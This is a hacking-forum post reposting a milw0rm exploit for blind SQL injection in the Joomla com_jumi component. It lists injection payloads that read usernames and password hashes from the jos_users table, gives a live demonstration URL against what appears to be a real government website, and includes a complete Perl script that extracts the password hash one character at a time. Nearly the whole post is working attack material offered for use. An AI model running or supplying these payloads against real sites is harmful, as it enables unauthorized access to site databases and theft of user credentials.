Multi Ethnic Hacking Group


    Joomla Component com_jumi (fileid) Blind SQL Injection Exploit

    Share
    avatar
    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    Joomla Component com_jumi (fileid) Blind SQL Injection Exploit

    Post by Foxi on Wed Jul 08, 2009 4:21 am

    Code:
    ------------------------------------------------------------------------------
    Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability
    ------------------------------------------------------------------------------


     #####################################################
     # [+] Author        :  Chip D3 Bi0s                #
     # [+] Email        :  chipdebios[alt+64]gmail.com  #
     # [+] Vulnerability :  Blind SQL injection          #
     #####################################################



    Example:
    http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>

    n=number fileid valid

    <Sql code>:
    '+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
    '+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
    /index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
    etc, etc...

    DEMO LIVE:
    http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/*

    etc, etc....

    +++++++++++++++++++++++++++++++++++++++
    #[!] Produced in South America
    +++++++++++++++++++++++++++++++++++++++

    if you want to save the work, you can use the following script

    -------------------------------

    #!/usr/bin/perl -w

    use LWP::UserAgent;


    print "\t\t-------------------------------------------------------------\n\n";
    print "\t\t                      |  Chip d3 Bi0s |                      \n\n";
    print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection        \n\n";
    print "\t\t-----------------------------------------------------------------\n\n";




    print "http://wwww.host.org/Path: ";
    chomp(my $target=<STDIN>);
    print " [-] Introduce fileid: ";
    chomp($z=<STDIN>);

    print " [+] Password: ";

    $column_name="concat(password)";
    $table_name="jos_users";


    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');


    for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter
    {            #c referido a ascci 48-57, 97-102
     



      for ($c=48;$c<=57;$c++)

    {
     $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
     my $res = $b->request(HTTP::Request->new(GET=>$host));
     my $content = $res->content;
     my $regexp = "com_";
    # print "limit:";
    # print "$x";
    # print "; assci:";
    # print "$c;";
     if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
     }





    for ($c=97;$c<=102;$c++)
    {


     
     $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
     my $res = $b->request(HTTP::Request->new(GET=>$host));
     my $content = $res->content;
     my $regexp = "com_";
    # print "limit:";
    # print "$x";
    # print "; assci:";
    # print "$c;";
     if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
     }
     

    }

    # milw0rm.com [2009-06-15]


      Current date/time is Tue Jul 25, 2017 12:48 am